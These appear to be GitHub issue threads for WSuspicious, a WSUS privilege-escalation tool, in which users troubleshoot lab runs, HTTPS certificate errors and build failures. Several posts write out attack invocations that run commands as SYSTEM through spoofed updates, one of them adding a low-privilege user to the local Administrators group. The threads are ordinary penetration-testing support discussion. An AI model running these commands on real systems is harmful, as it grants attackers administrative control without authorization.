Hi,

I'm having an issue trying to use the tool, the tool fails at stage 1 as follow:

With srv01, the server from which the WSuspicious.exe is launched. I get that a patch should prevent any exploitation with HTTP with SetProxyBehaviorForUpdateDetection reg key set to 0 by default.
Here i'm trying to exploit it because the SetProxyBehaviorForUpdateDetection reg key is set to 1, which mean that it call fallback to user proxy if system proxy is not reachable.

Wsus conf:

• WUServer : http://dc01.poudlard.co:8530
• UseWUServer : 1
• SetProxyBehaviorForUpdateDetection : 1

I just shut down the internet card to force the use of the user proxy as if not reachable and if SetProxyBehaviorForUpdateDetection is set to 1, it will use the user proxy then the vuln should be exploitable I taught.

Do you have any insight for this kind of error ?

Also another strange thing is when I wanted to check the user proxy address, set by the tool, it was "http://http=127.0.0.1" I changed it to "http://127.0.0.1", but the error is still the same tho.

Thank you

My setup:

• Domain controller (Windows Server 2019): dc01.lsc.lab
• Domain client (updated Windows 10)

The Client has WSUS over HTTPS configured and uses it correctly (https://dc01.lsc.lab:8531). The certificate is accepted by Microsoft Edge when accesing the IIS default page and WSUS endpoint (using a Certificate with SAN issued by the domain CA).

I'm setting the systems proxy via admin powershell with netsh winhttp set proxy 127.0.0.1:13337.

I'm executing the following command: .\WSuspicious.exe /command:" -accepteula -s -d cmd /c echo 1 > C:\hacked.txt" /autoinstall /enabletls (The attack does work, if WSUS over HTTP is configured, so all prerequisites are met.)

This is, what I get after running the command:

The WSUS Server is using HTTPS. Adding a self-signed certificate to store
Prompting user to add the certificate. Please wait.
Detected WSUS Server - dc01.lsc.lab
Listening on 'ExplicitProxyEndPoint' endpoint at Ip 127.0.0.1 and port: 13337
Hit any key to exit..

Titanium.Web.Proxy.Exceptions.ProxyConnectException: Couldn't authenticate host 'dc01.lsc.lab' with certificate 'dc01.lsc.lab'. ---> System.IO.IOException: Fehler bei Authentifizierung, da die Gegenseite den Transportstream geschlossen hat.
   bei System.Net.Security.SslState.InternalEndProcessAuthentication(LazyAsyncResult lazyResult)
   bei System.Net.Security.SslState.EndProcessAuthentication(IAsyncResult result)
   bei System.Threading.Tasks.TaskFactory`1.FromAsyncCoreLogic(IAsyncResult iar, Func`2 endFunction, Action`1 endAction, Task`1 promise, Boolean requiresSynchronization)
--- Ende der Stapelüberwachung vom vorhergehenden Ort, an dem die Ausnahme ausgelöst wurde ---
   bei System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
   bei System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   bei Titanium.Web.Proxy.ProxyServer.<handleClient>d__2.MoveNext()
   --- Ende der internen Ausnahmestapelüberwachung ---
   bei Titanium.Web.Proxy.ProxyServer.<handleClient>d__2.MoveNext()

The Windows Update GUI shows error code 0x800b0109 (displayed as "signature errors"):

When accessing any IIS page with the proxy activated and running, the certificate cannot be validated due to missing subject alternative name (SAN).

What about hybrid setups? where there is not just a WSUS but also a poll to windows update center?
in that case you'll get an error that the proxy cant connect to the MS update center specifically *.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/

May I know how to build code from Kali linux machine? I got errors...

dotnet msbuild /t:Restore /t:Clean /t:Build /p:Configuration=Release /p:DebugSymbols=false /p:DebugType=None /t:ILMerge /p:TrimUnusedDependencies=true

Microsoft (R) Build Engine version 16.10.1+2fd48ab73 for .NET
Copyright (C) Microsoft Corporation. All rights reserved.

Determining projects to restore...
All projects are up-to-date for restore.
WSuspicious -> /home/kali/Downloads/WSuspicious/WSuspicious/bin/Release/net45/WSuspicious.exe
An exception occurred during merging:
The type initializer for 'System.Compiler.CoreSystemTypes' threw an exception.
at System.Compiler.SystemTypes.Clear () [0x00013] in <23e1453939fb46538ee2be5a58d160d0>:0
at System.Compiler.TargetPlatform.Clear () [0x0007e] in <23e1453939fb46538ee2be5a58d160d0>:0
at System.Compiler.TargetPlatform.ResetCci (System.String platformAssembliesLocation, System.Version targetVersion, System.Boolean doNotLockFile, System.Boolean getDebugInfo, System.Compiler.AssemblyNode+PostAssemblyLoadProcessor postAssemblyLoad) [0x00001] in <23e1453939fb46538ee2be5a58d160d0>:0
at ILMerging.ILMerge.Merge () [0x002fb] in <8563c1f661ab40b2bd1382779cdc2720>:0
at ILMerging.ILMerge.Main (System.String[] args) [0x00100] in <8563c1f661ab40b2bd1382779cdc2720>:0
Assembly '/home/kali/Downloads/WSuspicious/WSuspicious/bin/Release/net45/BouncyCastle.Crypto.dll' doesn't have an entry point.
Assembly '/home/kali/Downloads/WSuspicious/WSuspicious/bin/Release/net45/BrotliSharpLib.dll' doesn't have an entry point.
Assembly '/home/kali/Downloads/WSuspicious/WSuspicious/bin/Release/net45/System.Buffers.dll' doesn't have an entry point.
Assembly '/home/kali/Downloads/WSuspicious/WSuspicious/bin/Release/net45/System.Memory.dll' doesn't have an entry point.
Assembly '/home/kali/Downloads/WSuspicious/WSuspicious/bin/Release/net45/System.Runtime.CompilerServices.Unsafe.dll' doesn't have an entry point.
Assembly '/home/kali/Downloads/WSuspicious/WSuspicious/bin/Release/net45/System.Threading.Tasks.Extensions.dll' doesn't have an entry point.
Assembly '/home/kali/Downloads/WSuspicious/WSuspicious/bin/Release/net45/Titanium.Web.Proxy.dll' doesn't have an entry point.
/home/kali/Downloads/WSuspicious/WSuspicious/WSuspicious.csproj(26,5): error MSB3073: The command "/home/kali/.nuget/packages/ilmerge/3.0.29/build/../tools/net452/ILMerge.exe bin/Release/net45/WSuspicious.exe /out:WSuspicious.exe ^
/home/kali/Downloads/WSuspicious/WSuspicious/WSuspicious.csproj(26,5): error MSB3073: bin/Release/net45/BouncyCastle.Crypto.dll ^
/home/kali/Downloads/WSuspicious/WSuspicious/WSuspicious.csproj(26,5): error MSB3073: bin/Release/net45/BrotliSharpLib.dll ^
/home/kali/Downloads/WSuspicious/WSuspicious/WSuspicious.csproj(26,5): error MSB3073: bin/Release/net45/System.Buffers.dll ^
/home/kali/Downloads/WSuspicious/WSuspicious/WSuspicious.csproj(26,5): error MSB3073: bin/Release/net45/System.Memory.dll ^
/home/kali/Downloads/WSuspicious/WSuspicious/WSuspicious.csproj(26,5): error MSB3073: bin/Release/net45/System.Runtime.CompilerServices.Unsafe.dll ^
/home/kali/Downloads/WSuspicious/WSuspicious/WSuspicious.csproj(26,5): error MSB3073: bin/Release/net45/System.Threading.Tasks.Extensions.dll ^
/home/kali/Downloads/WSuspicious/WSuspicious/WSuspicious.csproj(26,5): error MSB3073: bin/Release/net45/Titanium.Web.Proxy.dll" exited with code 1.

                  [01]: KB4483452
                  [02]: KB4493478
                  [03]: KB4493510
                  [04]: KB4493509

it has been done , but i try to net user

but not add any user

Unsupported but shouldn't be that difficult. See GoSecure/pywsus#2 for inspiration.

PR more than welcome!

Hi,
So I was trying to do a lab to test the PoC but unfortunatly updates are well done and and the output of the command just hangs on 'hit any key to exit ...' I would like to know if the following command: '.\WSuspicious.exe /command:" -accepteula -s -d cmd /c ""net localgroup Administrateurs lowpriv /add""" /autoinstall' will result on an error or warning if the two pre-requisites ie : ' the ability to set his local HTTP and/or HTTPS proxy and the user has the ability to execute programs that listen on a TCP port' are not met.
Thanks a lot